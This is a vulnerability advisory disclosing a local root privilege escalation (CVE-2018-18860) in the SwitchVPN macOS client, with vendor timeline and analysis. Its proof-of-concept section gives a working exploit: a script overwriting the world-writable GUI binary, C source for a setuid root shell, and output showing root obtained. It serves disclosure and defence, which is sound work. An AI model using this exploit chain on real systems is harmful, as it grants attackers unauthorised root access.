扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 |
======================================================================= Title: Privilege Escalation Vulnerability Product: SwitchVPN for MacOS Vulnerable version: 2.1012.03 CVE ID: CVE-2018-18860 Impact: Critical Homepage: https://switchvpn.net/ Identified: 2018-09-29 By: Bernd Leitner (bernd.leitner [at] gmail dot com) ======================================================================= Vendor description: ------------------- "By 2015 we were frustrated that the free internet we loved was under threat. As experts in online security we believed we could solve this problem. So we came together as a team to make SwitchVPN, a simple and powerful app to keep the internet free. SwitchVPN is simple. Install it on your phone, tablet or laptop, then just switch it on to keep the internet free. SwitchVPN is powerful. Our exclusive VPN Service technology is constantly being upgraded by a dedicated team of internet security experts." Source: https://switchvpn.net/ Business recommendation: ------------------------ By exploiting the vulnerability documented in this advisory, an attacker can fully compromise a MacOS system with an installation of the SwitchVPN client. Users are urged to uninstall the SwitchVPN client for MacOS until the issues have been fixed. Vulnerability overview/description: ----------------------------------- 1) Privilege Escalation Vulnerability (reserved CVE-2018-18860) After installation or an update, the script "fix_permissions.sh" is run by the application. This script changes the owner of the main application binaries to root and sets them to world-writable. Additionally, the SUID bit is set for another sensitive binary in the application folder. This configuration makes it very easy to escalate privileges to root. After the installation or update of SwitchVPN, the following script is run: ============================================================================================ ... switchvpn_updater.dat mb:MacOS b$ file switchvpn_updater.dat switchvpn_updater.dat: Qt Binary Resource file ... if (systemInfo.kernelType === "darwin") { console.log("Run permissions\n"); component.addElevatedOperation("Execute", "/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/fix_permissions.sh"); } ... ============================================================================================ mb:MacOS b$ cat fix_permissions.sh #!/bin/sh chown -R root /Applications/SwitchVPN/SwitchVPN.app/ chgrp -R admin /Applications/SwitchVPN/SwitchVPN.app/ chmod -R 777 /Applications/SwitchVPN/SwitchVPN.app/ chmod -R u+s /Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/compose8 ============================================================================================ This leads to an overpermissive application configuration: ============================================================================================ mb:MacOS b$ ls -al total 18720 drwxrwxrwx35 rootadmin 1120 Sep 29 20:39 . drwxrwxrwx16 rootadmin512 Sep 29 20:39 .. -rwxrwxrwx 1 rootadmin 106224 Oct 122017 SwitchVPN -rwxrwxrwx 1 rootadmin4693216 Oct 122017 SwitchVPN_GUI -r-xr-xr-x 1 rootwheel2859376 Oct 122017 compose -r-xr-xr-x 1 rootwheel29184 Oct 122017 compose10 -r-xr-xr-x 1 rootwheel29184 Oct 122017 compose11 -r-xr-xr-x 1 rootwheel59152 Oct 122017 compose3 -r-xr-xr-x 1 rootwheel39008 Oct 122017 compose4 -r-xr-xr-x 1 rootwheel 587776 Oct 122017 compose6 -r-xr-xr-x 1 rootwheel 278848 Oct 122017 compose7 -r-sr-xr-x 1 rootwheel22800 Oct 122017 compose8 -r-xr-xr-x 1 rootwheel19056 Oct 122017 compose9 -r-xr-xr-x 1 rootwheel 132160 Oct 122017 composec -r-xr-xr-x 1 rootwheel 510464 Oct 122017 composecn -r-xr-xr-x 1 rootwheel 5632 Oct 122017 down.sh -rwxrwxrwx 1 rootadmin245 Oct 122017 fix_permissions.sh -rw-r--r-- 1 rootadmin 56 Sep 29 20:39 log.txt -r-xr-xr-x 1 rootwheel39050 Oct 122017 up.sh ============================================================================================ Further investigation shows, that the "SwitchVPN_GUI" binary is run as root: ============================================================================================ mb:MacOS b$ ps aux | grep -i switch root 15165 4.60.4451595272912 ??S 8:39PM 0:08.84 SwitchVPN_GUI ============================================================================================ After statically analysing the "SwitchVPN" binary, it became clear, that it runs the "compose8" SUID root binary. Further analysis showed, that "compose8" subsequently runs the "SwitchVPN_GUI" binary and since it's world-writable, an attacker can exploit the situation to escalate privileges. ============================================================================================ # SwitchVPN -> compose8 ...add rdx, [rdx+10h] lea rsi, aCompose8_0 ; "compose8" lea rcx, aSwitchvpn ; "SwitchVPN" xor r9d, r9d xor eax, eax mov rdi, rbx; char * mov r8, r14 call_execl ... ============================================================================================ ============================================================================================ # compose8 -> SwitchVPN_GUI ... lea rsi, aCompose8WillIn ; "Compose8 will invoke GUI app %s, %s\n" xor eax, eax mov rdx, rbx mov rcx, r12 call_fprintf cmp r15d, 4 lea rdx, aB ; "-b" cmovnzrdx, r14 xor ecx, ecx xor eax, eax mov rdi, rbx; char * mov rsi, r12; char * call_execl ... ============================================================================================ Running the "SwitchVPN" binary from the command line confirms the issue: ============================================================================================ ./SwitchVPN This app (compose8) invoked with args: /Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS, SwitchVPN Compose8 will invoke GUI app /Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/SwitchVPN_GUI, SwitchVPN_GUI ============================================================================================ Proof of concept: ----------------- 1) Privilege Escalation Vulnerability A situation like the one described above provides a wide range of possibilities for escalating privileges to root. A quick and easy way is to write the following shell script to "SwitchVPN_GUI": ============================================================================================ #!/bin/bash chown root /tmp/shell chmod 4755 /tmp/shell ============================================================================================ Create and compile the following execve() based shell: ============================================================================================ #include <stdlib.h> #include <unistd.h> main () { setuid(0); seteuid(0); setgid(0); execve("/bin/sh", 0, 0); } gcc shell.c -o shell ============================================================================================ Copy the shell binary to an attacker controlled location (e.g. /tmp). Start the "SwitchVPN.app" as a local, unprivileged user. Afterwards the execution of /tmp/shell will drop the user/attacker to a root shell: ============================================================================================ -rwsr-xr-x 1 rootwheel8576 Sep 29 20:34 shell -rw-r--r-- 1 b wheel 127 Sep 29 20:33 shell.c bash-3.2$ whoami b bash-3.2$ ./shell bash-3.2# whoami root ============================================================================================ Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: 2.1012.03. Earlier versions might be vulnerable as well. Vendor contact timeline: ------------------------ 2018-10-04: Requested security contact via https://switchvpn.net 2018-10-10: Contacted vendor through mark@switchvpn.com 2018-10-17: Requested status update from vendor 2018-10-30: Sent new contact details & public PGP key to mark@switchvpn.com 2018-10-31: Requested status update from vendor 2018-11-12: Informed vendor about advisory release Solution: --------- None. Workaround: ----------- None. EOF B. Leitner / @2018 |
体验盒子
